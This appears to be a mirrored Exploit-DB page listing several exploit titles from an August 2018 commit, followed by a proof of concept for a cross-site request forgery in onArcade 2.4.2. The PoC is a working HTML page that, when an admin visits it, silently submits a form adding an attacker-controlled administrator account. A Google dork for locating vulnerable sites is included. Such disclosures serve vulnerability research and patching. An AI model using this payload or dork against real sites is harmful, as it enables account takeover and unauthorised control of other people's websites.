exploit-db-mirror/exploits/php/webapps/45154.html
Offensive Security 9d8170fd85 DB: 2018-08-09
9 changes to exploits/shellcodes

TP-Link Wireless N Router WR840N - Denial of Service (PoC)

Splinterware System Scheduler Pro 5.12 - Privilege Escalation
iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow
iSmartViewPro 1.5 - 'Account' Buffer Overflow

OpenEMR < 5.0.1 - Remote Code Execution

Kirby CMS 2.5.12 - Cross-Site Scripting
osTicket 1.10.1 - Arbitrary File Upload
LG-Ericsson iPECS NMS 30M - Directory Traversal
LAMS < 3.1 - Cross-Site Scripting
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
Monstra 3.0.4 - Cross-Site Scripting
LAMS < 3.1 - Cross-Site Scripting
onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)
Monstra 3.0.4 - Cross-Site Scripting
2018-08-09 05:01:53 +00:00

25 lines
No EOL
966 B
HTML

# Exploit Title: Cross-Site Request Forgery (Add Admin)
# Google Dork: Powered by onArcade v2.4.2
# Date: 2018/August/4
# Author: r3m0t3nu11[Zero-way]
# Software Link: ["http://www.onarcade.com"]
# Version: ["Uptodate"]
the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
[P0C]#
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://server/path/admin/members.php?a=add_member&ajax=1"method="POST">
<input type="hidden" name="username" value="r3m0t3nu11" />
<input type="hidden" name="email" value="l0v3rs14&#64;gmail&#46;com"/>
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="user&#95;group" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>